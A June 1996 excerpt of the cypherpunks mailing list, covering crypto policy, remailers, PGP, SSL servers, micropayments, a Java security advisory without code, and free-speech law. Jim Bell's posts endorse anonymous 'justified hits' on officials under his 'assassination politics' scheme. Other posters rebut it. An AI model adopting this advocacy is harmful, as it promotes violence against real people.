>while I overlooked that he could think twice before doing so.  But by 
>his nature, being a violent or thug at heart, he will understand this 
>"peace based on threat" maybe even better than a pacifist at heart.  
>So, my arguments might not stand.  

As can be expected, people will be looking out for themselves in an 
AP-dominated system, just as today.  I think most people will have a fairly 
good idea who's targeting them if the hit's not justified.  Almost every 
justified hit can be fairly anonymous.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 7 Jun 1996 21:47:39 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: ALERT: Court decision expected soon in free speech case; spread the word! (fwd)
In-Reply-To: <v03006f20addc6f66dd18@[199.0.65.105]>
Message-ID: <Pine.GUL.3.93.960606180545.19086K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Well, it worked. The web server on www.vtw.org is *totally* overloaded now.

When are these people going to learn about the Internet? :-)

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Fri, 7 Jun 1996 23:16:06 +0800
To: cypherpunks@toad.com
Subject: RISKS: YAJSH
Message-ID: <v01540b01addd3ef40288@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Reposted from RISKS:   Yet Another Java Security Hole:

------------------------------

Date: Sun, 2 Jun 1996 07:46:20 +0000 (BST)
From: David Hopwood <david.hopwood@lady-margaret-hall.oxford.ac.uk>
Subject: Another Java attack

There is another serious security bug in the class loading code for all
currently available Java browsers:

    Netscape up to versions 2.02 and 3.0beta4 (except Windows 3.x)
    Oracle PowerBrowser for Win32
    HotJava 1.0beta
    'appletviewer' from the Java Development Kit up to version 1.0.2

Sun, Netscape, and Oracle have been sent details of the problem (which is
partly related to the ClassLoader attack found by Drew Dean, et al. in
March).  The attack works by exploiting a design flaw in the mechanism that
separates JVM classes into different namespaces.

Using this bug, an attacker can bypass all of Java's security restrictions.
This includes reading and writing files, and executing native code on the
client with the same permissions as the user of the browser.

The only way to avoid this problem at the moment is to disable Java. For
more details see
    http://ferret.lmh.ox.ac.uk/~david/java/bugs/

Technical details will be posted when Sun, Netscape, and Oracle release
patches.

David Hopwood  david.hopwood@lmh.ox.ac.uk  http://ferret.lmh.ox.ac.uk/~david/

------------------------------

Date: Thu, 6 Jun 1996 14:15:46 -0700
From: mrm@doppio.Eng.Sun.COM (Marianne Mueller)
Subject: Another Java attack

David Hopwood, a Java researcher in the UK, has uncovered a new security bug
in Java [RISKS-18.18].  In simple terms, he has been able to manipulate the
way objects are assigned and the way they collaborate, in order to undermine
the applet security manager.

Hopwood contacted JavaSoft directly re: the bug, and we have had a team
working on a fix for the past 72 hours.  In addition, we are applying
Hopwood's model to conduct a security review, to determine if there are
other bugs that may apply.

We are currently thoroughly testing the fix, and plan to release a patch as
soon as possible.  As we complete more testing of the fix, a more detailed
description of the bug and the fix will be added to the JavaSoft security
FAQ at http://java.sun.com/sfaq/.

JavaSoft is grateful for the internet security community's active interest
in reviewing our code and we welcome feedback that makes Java better
technology.

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 7 Jun 1996 12:07:38 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Tell it like it is, Perry
Message-ID: <199606061828.LAA23429@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Cypherpunks <cypherpunks@toad.com>
              Perry Metzger <perry@piermont.com>


	now, why would anyone want to send Perry a PerryGram?  --Perry's prose is 
    far too elegant to warrant criticism, particularly the closing remark!

= Your attitude seems to be "you can't prove anything so you must assume 
= that they are innocent." My attitude is "I can't prove anything so 
= they can't go to jail, but that doesn't mean I have to believe that 
= they are innocent -- in fact, I'm an idiot if I believe that." 
=  
= > I think that given Perry's ad-hominem attacks and the fact that this 
= > has nothing to do with cryptography that its about time someone sent 
= > Perry a Perry-gram. 
=  
= Cypherpunks no longer is a cryptography mailing list. Its a sewer. 
=  
= Perry 
=  



--
 When you can't say 'fuck,' 
   you can't say 'FUCK THE CDA!' 
        --Lenny Bruce rephrased





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Fri, 7 Jun 1996 16:37:22 +0800
To: cypherpunks@toad.com
Subject: Electronic Signatures
In-Reply-To: <199606061726.KAA05826@rigel.infonex.com>
Message-ID: <19960606185840.9230.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


 > 
 > 	The law does not specify how an electronic document must be 
 > signed, but Barassi and others say it probably will mean coding the text 
 > and typed signature so they cannot be changed by anyone other than the 
 > writer.

Doh!  So set up a business which certifies PGP signatures.  What you
do is take money from people in exchange for a sheet of paper which
contains the PGP fingerprint, and a notarized copy of the person's
driver's license, credit card, or whatever.  Once you get that piece
of paper, you sign the person's PGP key with your business's key.
You certify that you have the piece of paper on file, and will provide
it upon payment of some small fee.

There.  A signature registry.  And you can even do it through a
service like First Virtual, or Digicash or Cybercash.  The only reason
I haven't done it is because I have other business with a higher
margin, and there's only so much Russell to go around.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 7 Jun 1996 21:03:37 +0800
To: warlord@MIT.EDU (Derek Atkins)
Subject: Re: Security of PGP if Secret Key Available?
In-Reply-To: <199606061756.NAA16447@toxicwaste.media.mit.edu>
Message-ID: <199606070010.TAA05952@homeport.org>
MIME-Version: 1.0
Content-Type: text


Leave it for 3.1.  There are worse programs being advanced because
people feel we're waiting too long for PGP3.

Derek Atkins wrote:

| PGPlib has an interface to encrypt the whole keyring, however that
| probably isn't going to be fully implemented unless time permits.
| This interface allows you to encrypt the WHOLE keyring in a
| passphrase, which includes not only the secret components, but the
| public components as well.  However I don't know if I'll have the time
| to get to it.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Fri, 7 Jun 1996 19:53:46 +0800
To: cypherpunks@toad.com
Subject: SF Bay Area Physical Cpunks Meeting, June 8th, Stanford Turing Aud
Message-ID: <Pine.SUN.3.91.960606190304.8686A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


This Saturday, Turing Auditorium, Noon-5. Unrestricted Ethernet
connectivity (both thinnet and 10BaseT) will be available; email me for an
IP address. Turing Aud has a Mac and a PC on the Net connected to an 
EXCELLENT presentation system. If you have something you'd like to show 
off, this is the place, and we're still short on topics.

Graphical actualizations of ideas raised at the last meeting regarding 
crypto GUIs would be one way to use the space.

The agenda is rather slim... Hugh was working on it, but nobody seems to
have anything to say. If we get really desperate for ideas, I might end up
talking about what I've REALLY been doing for the last five months. Dave
Harman will probably miss this one, but he's still invited.

Long, anal form of the directions follows.

-rich


When:

 June 8th, Noon-5.

Where:

 Turing Auditorium, Stanford University. Directions and maps below.

Your Hosts:

 Hugh Daniels <hugh@toad.com>, speaker wrangler/emcee
 Rich Graves <llurch@networking.stanford.edu>, venue/den mother/fucking *

Amenities:

 * Seating for 100 (should be enough)
 * Plenty of white boards
 * Air conditioning
 * High-end Mac and Windoze PC on the Internet, both hard-wired into an
   EXCELLENT projection system, 800x600x16-bit or so
 * Open 10Base2 and 10BaseT Ethernet drops for your laptop, no firewall to
   Net; email rich@c2.org for IP address
 * One analog phone
 * NO munchies within 5 minutes' walk, but Rich will bring bagels
 * NO plugging your own laptops into the projection system; however, the
   Mac will have an X server and, of course, web clients

Dinner:

 Fanny & Alexander's? Or Jing Jing again?

Directions:

 If you have a GPS receiver, head for 37.4296875N 122.1783752E.

 If you have excellent hearing, call 415-853-9080 and follow the ringing.

 Or, get to Stanford's Campus Drive via 280-Sand Hill or 101-El Camino
 Real-Embarcadero. From 280, take Campus Drive left (clockwise). From 101,
 take Campus Drive right (counterclockwise). Turn South (centripetal) at
 Panama Street and take an immediate left into the Jordan Quad parking lot
 (empty on weekends). Walk between Pine and Redwood Halls to Polya. 
 Turing is between Polya and Cypress. It doesn't appear on most campus
 maps, but it's there, honest. Entrance to Turing Auditorium is by the
 Pac Bell payphone sign. 

Maps:

 http://www-leland.stanford.edu/group/Transportation/PGrid4.html (parking)
 http://www.stanford.edu/gifs/campus.1620-63-4.gif (800K campus map)
 http://www.stanford.edu/home/visitors/vicinity.html (note: upside down!)

Socialized transportation:

 CalTrain to the Palo Alto station; 20-minute walk or arrange to be picked
 up by a local. 7F bus. See http://www.stanford.edu/group/Transportation/

-rich
 quidquid latine dictum sit, altum viditur




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Fri, 7 Jun 1996 20:21:56 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Anonymous stock trades.
Message-ID: <9606062327.AA04162@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>I suppose it depends on what you call "open", eh, Phill?

>If by "open", you mean financial markets where, as Milton Freedman says,
>each new regulation raises the cost of entry and protects the surviving
>firms by killing their smaller competion with red tape, then we have "open"
>markets.

Well, Milton Friedman's method for saving the whale is to leave it to the free 
market, if people want whales in the oceans they won't buy whale meat. The point 
that even if no US person eats whale, a few thousand "gourmets" in Japan can eat 
their way through the remaining stocks of many species in a few years escapes 
him. So forgive me if if find you authority somewhat less than compelling.

Adam Smith makes the point rather better in his analysis of monopolies and how 
they affect the market. But remember that although regulations may be instituted 
as protectionist mechanisms that is not the only purpose that regulations are 
introduced.


>If by "open", you mean that people can't purchase the attention of their
>favorite politician fair and square, without having to play zero-sum games
>with barnyard animals, then we have "open" markets. ;-).

There are so many negatives in that sentence I can't figure out which way you 
are arguing. Certainly there are many senators, congressman etc who can be 
bought for a contribution to their election fund or a huge advance on their 
memoirs. 


>Nothing personal, Phill, but it does seem like it's more a question of what
>you're afraid of, than what *is*, right?

No, it is a case of whether you are applying ideological judgements or prepared 
to analyse the system itself. I do not believe in the idol of the free market. I 
do not consider ecconomists to have justified the level of inane self-satisfied 
certainty about their field that they exude. I was talking to a professor at the 
Sloane school yesterday who made precisely this point.

Deciding what is right implies an ethical judgement. Are you basing your 
argument on Kantian or consequentialist assumptions? I can argue either but 
since most of my thesis is based on a logical positivist approach I'm far more 
sympathetic to the utilitarian point of view.


The free market is not in itself an ethical basis - that would be creating an 
ought from an is. The problem which libertarian idelogues are affraid to face up 
to is that markets have required regulation to keep them open and free. Its all 
very well for people to jump up and down, stampt their feet and claim the 
opposite but this is what every government in the free world believes. The 
effects of deregulation in the savings and loans area make it unlikely any 
further experiments in that area will be tried for a while.


		Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Fri, 7 Jun 1996 16:36:57 +0800
To: unicorn@schloss.li (S. Logan vonBernhardi)
Subject: Re: WWW servers.
In-Reply-To: <Pine.SUN.3.91.960606221523.18480A-100000@polaris>
Message-ID: <199606070241.TAA16588@niobe.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I was hoping you'd chime in.
> How about for macs?

	I think WebStar/SSL does SSL, but I don't know if it does
client auth. I doubt it though. Netscape Navigator 3.0b4 does client
auth, if you need a client that runs on a mac.

> 
> "Build your own CA" ?

	Yeah, my package (and XCert Sentry) has stuff to let your
build your own CA, for your own company, or whatever.

> Hmmm, how's it done?  Included with the Apache package?
> 

	Xcert Sentry is a seperate product, sold by a seperate
company. http://www.xcert.com/

> 
> Got a marketing package around?

	Not yet. http;//www.us.apache-ssl.com/ for now.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Fri, 7 Jun 1996 20:51:46 +0800
To: cypherpunks@toad.com
Subject: Re: Multiple Remailers at a site?
In-Reply-To: <19960604232157.2053.qmail@ns.crynwr.com>
Message-ID: <19960606195025.9398.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
 > nelson@crynwr.com writes:
 > >Scott Brickner writes:
 > > > If the remailer does a good job with the delays and shuffling, then
 > > > it becomes difficult for the analyst to match message a with
 > > > message b, leaving him with what he already knew (that A and
 > > > RemailerX have a common interest, as to B and RemailerX, but the
 > > > interests may be wholly unrelated).
 > >
 > >Nope.  Not if each of them runs a remailer.  That's why mixmaster is
 > >SO WONDERFUL.
 > 
 > The "to" and "from" values that the traffic analyst will be using
 > are the IP addresses in the packets.  It doesn't matter whether
 > mixmaster, cypherpunks, or penet remailers are used, they still use
 > IP addresses.

Sure *does* matter.  There's no computationally feasible way to
associate one mixmaster message with another.  The only way you can
get a clue is by analyzing who sends mail into and out of the
mixmaster system.  If both of your endpoints are within the mixmaster
system, you have no entering or exiting mail to analyze.  It doesn't
matter if the mixmaster remailers are on the same or different systems.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 7 Jun 1996 16:59:11 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <addce3e0020210047407@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:18 PM 6/6/96, Igor Chudov @ home wrote:
>Jim McCoy wrote:
....
>> As long as that person is not the President of the United States (at least
>> for U.S. citizens.)  This was the issue which initiated this thread, the
>> implied threat made by our favorite nutcase.
>
>Are you sure? Can you cite references? From my readings on the 1st
>amendments, any general kind of speech is legal, even if it advocates
>killing certain officials, including us presidents. *If* instead of
>general advocacy a person gave specific orders or concrete requests to
>kill the prez, then it would not be speech. Please correct me if I am
>wrong.

* First, I disagree with Bruce Baugh's earlier comment that there is a
nonzero chance this list could be "shut down." (Well, "nonzero" covers a
_lot_ of numbers, but as it usually understood in hackerspeak, "nonzero"
means "finite," and "finite" means "a credible chance." It is this with
which I disagree.)

There is virtually no chance that even fairly egregious threats would allow
the government to "shut down" a public forum. Prior restraint and all that.
I suppose there is some slight chance that John Gilmore could be held
liable in some way for messages flowing through his "toad" machine, and
that hence the instantiation of the Cypherpunks list _on toad_ could be
affected. But I am skeptical even of this. In past cases where the
government felt a newspaper or magazine had published or planned to publish
material they felt was illegal ("The Progressive" and "The New York Times,"
for example), the ongoing operations of these newspapers were not stopped.

(There may be cases people can dig up where some newspaper or newsletter
was "shut down," but I think such cases would be hard to find in the last
several decades. Am I wrong on this?)

* Second, there are indeed various laws about threatening the President.
And there are laws about directly threatening others as well. ("Directly
threatening" is a fuzzy idea, which I don't plan to debate here.)

However, recall that Senator Jesse Helms elliptically threatened President
Clinton by saying that Clinton had probably better be wearing a
bullet-proof vest if he ever visited Helms' part of the country. (Even the
Republicans were shocked by this, and, I surmise, cast Helms into the outer
darkness, as Helms has been keeping a low profile for the past 18 months.)

* Third, while I am bored with Bell's "single note" point of view ("I have
a solution for this") and while I feel his "assassination politics" is both
naive and derivative, I don't think his advocacy of AP constitutes a direct
threat to anyone. He is not actually setting up the betting markets which
would make AP more of a reality, nor is he calling for the killing of any
particilar persons.

* Fourth, merely discussing alternative political systems is not enough to
trigger legal action, at least not today.

* Finally, there may be provisions in the Terrorism Act (don't know precise
name, but Clinton signed it into law a few months ago) which could
conceivably trigger having certain groups classified as "terrorist groups."
The law is too new and too untested, I think, to have any implications for
a mailing list such as ours.

Frankly, the list is much likelier to die off from debates about fascism
and Hillary's investments than it is to be "shut down" by government
action.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 7 Jun 1996 16:44:11 +0800
To: Bruce Baugh <cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <199606070328.UAA19061@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 PM 6/5/96 -0700, Bruce Baugh wrote:

>The rest of us (in the US) live in a country where the government can now
>pretty much declare anyone they like terrorists, and suspend habeus corpus
>on the flimsiest of grounds, and use evidence against foreigners that
>doesn't have to be presented to the accused, and all sorts of fun stuff.

But if that's true...

>I don't think that my direst claims _will_ come true. But I don't think I'm
>speculating anything that _can't_ happen, and I see much of it as
>increasingly likely in the light of the ongoing furor over crypto and
>related matters.

If that's true (and I don't doubt that it is) doesn't that suggest to you 
that something serious needs to be done to fix the problem?

>From a tagline:

"If you always do what you have always done, you will always get what you've
always got."

If you say we shouldn't rock the boat because the bad guys might come, isn't 
it just possible that the REASON the "bad guys might come" is because we 
have not, in the past, adequately rocked the boat?

My impression is that it is frequently the pacifist-types who get us into 
war, because they start the process out by tolerating actions by others that 
turn into more serious actions, etc.  You know, the appeasers.  Are you an 
appeaser?

All I'm advocating is to set up a system which gives government-types a very 
stark choice: War or peace.  Then let them make that choice.  I predict they 
will choose peace.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 7 Jun 1996 17:52:05 +0800
To: cypherpunks@toad.com
Subject: Re: OECD on Crypto
Message-ID: <199606070342.UAA20358@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:22 AM 6/5/96 -0700, Mixmaster wrote:

>OECD NEWS RELEASE - Paris, 10 May 1996 
>
>OECD EXPERTS BEGIN DRAFTING CRYPTOGRAPHY GUIDELINES 
>
>Cryptography experts from OECD countries have begun drafting a
>proposal for OECD Cryptography Policy Guidelines that governments can
>use as a guide to formulate their national policies on encryption. 
>
>Many governments are under pressure within their own countries to
>develop a national position on cryptography, 

This is bullshit.  If anything, it's exactly the opposite:  It is the 
GOVERNMENTS and those who hold government jobs who are doing the 
"pressuring."    I haven't seen more than a trickle of desire for a 
"national position on cryptography."  What Internet-people want is the 
ELIMINATION of a "national position on cryptography," I think.

>which is used in computer
>technology to protect everything from product designs to health and
>tax records and global correspondence. But the needs of global
>technologies and applications require an international --rather than a
>strictly national -- approach to policymaking.

In other words, various Constitutions are getting in the way!  Tough!

> The fast-paced
>development of the Global Information Infrastructure adds an element
>of urgency.

In other words, the governments are feeling that the situation is getting 
out of their control!  Excellent, that's progress.

>
>The business community, individuals and national security and law enforcement
>agencies are all pressing for encryption guidelines

BULL!  The businesses are saying, "Don't restrict crypto."  The individuals 
are saying, "Don't restrict crypto!"  

So-called "law enforcement" agencies are saying, "We're losing control of 
the public!  Where's '1984' when we need it!"


> and the OECD will strive to
>reflect the legitimate interests of all these groups as it drafts Guidelines. 

I don't think so.


>The private sector is closely involved in drafting the Guidelines,
>with business representatives from the Business and Industry Advisory
>Committee (BIAC) participating at the meeting. 

Gee, what about THE INDIVIDUALS?  You know, the ones you steal your tax 
money from?  That's right, the peons.


>The OECD meeting, which took place on 8 May, was hosted by the US
>Department of State in Washington DC.

That's because the USG is the most unhappy, because its Constitution is 
making it very difficult to ban crypto.

 It was held immediately after a
>Second Business Government Forum on Global Cryptography Policy in
>Washington DC on 7 May, which was cosponsored by the OECD, the 
>International Chamber of Commerce (ICC) and the Business and Industry Advisory
>Committee (BIAC) to the OECD.

It probably had a similar lack of participation by ordinary citizens and 
netizens.  Do I detect a pattern here?

> Two similar conferences took place in Paris in
>December, when OECD countries and business representatives met for the
>first time to discuss international cryptography policy. 

Probably because they had gotten wind a few months before of a serious 
potential danger to the continued hegemony of governments over the people.

>
>The process of drafting the OECD Cryptography Policy Guidelines will
>continue at an experts meeting in June and is due for completion in
>early 1997.

It's already too late!


>For further information, please contact Ms. Hiroko Kamata, OECD 
>Directorate for Science, 
>Technology and Industry (tel. 331 45 24 80 04 - fax. 331 45 24 93 32 - 
>e-mail. hiroko.kamata@oecd.org).

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 7 Jun 1996 21:12:26 +0800
To: cypherpunks@toad.com
Subject: "Fascism is corporatism"
Message-ID: <addcfd85030210047ae2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:18 PM 6/6/96, Rich Graves wrote:
>On Wed, 5 Jun 1996, Bruce Baugh, who usually knows better, wrote:
>
>> Fascism has no intrinsic link to genocide. It is a theory of economics,
>> basically, in which the state has ultimate authority over production and
>> distribution without (as in socialism) actually _owning_ the means of
>> production or distribution. This is generally accomplished through
>> cartelization, the creatin of industry-wide councils in which the
>> representatives of the most powerful firms set policy in conjunction with
>> the representatives of the government.
...
>Yes, I'm afraid these ahistorical myths are widespread. What _do_ they teach
>in these schools?
>
>Pick up anything by Renzo De Felice to gain a basic historical understanding
>of what fascism was about, from someone who was sympathetic to them.

Rich, I don't think it nearly so clear as you are claiming. The definition
of fascism, that is. Without resorting to the usual ploy of quoting
Webster's (a ploy I usually am not impressed by), let me cite an
"anti-fascist" radio personality, Dave Emory, who I have been listening to
nearly every week for several years.

Dave is undeniably anti-fascist, an unusual mixture of left-leaning views
and National Rifle Association sympathies, and he often quotes Mussolini's
famous "Fascism is corporatism" line. That is, a view more similar to Bruce
Baugh's point that fascism is primarily an economic theory, about the
organization and ownership of production systems, than about hatred of any
particular ethnic group.

It is certainly true that Italian and German fascism (and the important
variant of "national socialism") become intertwined with certain forms of
racism, with which we are all familiar, but I don't think Bruce is at all
wrong in his definition of fascism. That Hitler and his group combined
fascist economic theories with occultist views of racial superiority does
not mean the two viewpoints are identical.

("Fascism is corporatism" is of course not an overall indictment of all
corporations. "Corporatism" is basically a view that government should
identify key industries and corporations and then pick the winners and
support them while suppressing their competitors. This oversimplifies what
Mussolini, Emory, myself, etc. mean by "corporatism," but I hope this gives
at least a glimpse. And we could get off into discussions of "state
capitalism" and how the Soviet and Chinese forms of government were
essentially examples of "state capitalism," but this would be a long and
involved debate.)


>I'd also recommend a biography of the very influential and gifted American
>modernist poet Ezra Pound, who led the Italian fascist propaganda effort
>from 1941 to 1943 and spent six months in an American POW camp, followed by
>some time in mental hospitals as his rants against jewish conspiracies under
>every bed became increasingly incoherent, for his trouble. Like Orwell's
>very complicated views towards socialism and Stalinism (see Homage to
>Catalonia), e. e. cummings' anti-government pacifism, Whitman's queerness,
>and Byron's essential kookiness, this is something your high school english
>teacher probably failed to mention.

My high school teachers failed to mention much of anything, but this was
hardly surprising to me--I never expected them to. Fortunately, I knew how
to read, and so I learned all of these things. (Except for Pound, whom I
didn't encounter until my first year in college.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 7 Jun 1996 16:36:52 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: Micropayments: myth?
In-Reply-To: <199606061924.MAA10732@netcom10.netcom.com>
Message-ID: <199606070205.WAA20230@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Vlad the Imposter writes:

> >Telephone companies have found billing to be a major bottleneck.
> >By some estimates, up to 50% of the costs of a long distance call
> >are for billing, and this is on the order of a $100 billion per year
> >market worldwide.  Internet providers have been moving to a flat fee in 
> >order to minimize these costs, even though this creates the incentive for 
> >network resource overusage.  
> 
> imagine a user who controls his own wallet. he knows when he is paying
> from that wallet. you seem to have this idea that outsiders could
> make queries to that wallet that would be hard for the consumer to
> keep track of. this makes no sense to me. the wallet action will always
> be tied with some other action. the user picks up the phone to dial
> somewhere, and it says, "that will be .3c-- will you pay"? he says
> yes. 

I'm sort of a neophyte when it comes to digital cash, micropayments and
so forth but it seems to me that your example provides a fine platform
for discussing the problem.  How will you know the cost is .3c a priori?
What's to stop me from saying yes to the .3c and staying on the line
forever?  If you disallow that, how?  Will it cost the same amount if
I'm not sending anything as it will if I'm sending a live video + audio
feed?  If so, what's to stop me from bundling my whole neighborhood's
Internet traffic into this call?  If not, how will you tell the
difference without monitoring my usage and requiring me to pay for the
additional bandwidth I use?

Or are you saying that each IP packet will have an appropriately sized
digital cash payment attached?  That seems like too much overhead.
And besides, that contradicts your idea that the user would explicitly
approve each wallet access.

It gets even worse if you're an ISP, you obviously can't sit there
and approve each session that goes by (even if you could distinguish
higher level session boundaries which you won't be able to do).  Are
you just to assume at the end of the day that everything worked
perfectly and you received enough revenue to cover your costs without
knowing anything about the payment/usage profiles of any of your
customers?  And how is the ISP's network provider to know how much to
charge the ISP?


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "S. Logan vonBernhardi" <unicorn@schloss.li>
Date: Fri, 7 Jun 1996 15:27:28 +0800
To: sameer@c2.org
Subject: Re: WWW servers.
In-Reply-To: <199606062121.OAA07502@niobe.c2.net>
Message-ID: <Pine.SUN.3.91.960606221523.18480A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 6 Jun 1996 sameer@c2.org wrote:

> > 
> > Does there currently exist a system which permits webservers to restrict 
> > access to clients who have a given certification?
> 
> 	Yup.

I was hoping you'd chime in.
How about for macs?

> 
> > 
> > What is the current certification practice?
> 
> 	Use either VeriSign, or build your own CA.

"Build your own CA" ?

> > 
> > How easy is it to certify a given client?
> 
> 	Rather easy, using XCert Sentry.

Hmmm, how's it done?  Included with the Apache package?

> > 
> > Are webserver certifications sufficently secure today?
> 
> 	"sufficiently" by whose definition?

Yours.

> > 
> > What are the best servers to use for secure web pages and certification 
> > currently in the United States?
> 
> 	=) Stronghold: The Apache-SSL-US, coupled with XCert
> Sentry. What else?

Got a marketing package around?


> -- 
> Sameer Parekh					Voice:   510-601-9777x3
> Community ConneXion, Inc.			FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.net/ (or login as "guest")		sameer@c2.net

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 7 Jun 1996 18:52:18 +0800
To: Just Rich <cypherpunks@toad.com
Subject: Re: SF Bay Area Physical Cpunks Meeting, June 8th, Stanford Turing Aud
Message-ID: <199606070520.WAA26866@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:15 PM 6/6/96 -0700, Just Rich wrote:
>This Saturday, Turing Auditorium, Noon-5. Unrestricted Ethernet
>connectivity (both thinnet and 10BaseT) will be available; email me for an
>IP address. Turing Aud has a Mac and a PC on the Net connected to an 
>EXCELLENT presentation system. If you have something you'd like to show 
>off, this is the place, and we're still short on topics.

> If you have a GPS receiver, head for 37.4296875N 122.1783752E.

That's specified to a resolution of about 2/5 of an inch.  If everyone heads 
to this exact spot, it's going to be a VERY friendly meeting!



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 7 Jun 1996 19:48:29 +0800
To: Jeff Barber <vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: Micropayments: myth?
Message-ID: <199606070553.WAA28796@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:05 PM 6/6/96 -0400, Jeff Barber wrote:
>Or are you saying that each IP packet will have an appropriately sized
>digital cash payment attached?  That seems like too much overhead.
>And besides, that contradicts your idea that the user would explicitly
>approve each wallet access.
>
>It gets even worse if you're an ISP, you obviously can't sit there
>and approve each session that goes by (even if you could distinguish
>higher level session boundaries which you won't be able to do).  Are
>you just to assume at the end of the day that everything worked
>perfectly and you received enough revenue to cover your costs without
>knowing anything about the payment/usage profiles of any of your
>customers?  And how is the ISP's network provider to know how much to
>charge the ISP?

I think I'm starting to sound like a broken record, so I'll stop with this
post.  Some of the issues you are discussing are addressed by the Digital
Silk Road proposal from Norm Hardy and Dean Tribble.

See: http://www.agorics.com/agorics/dsr.html

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
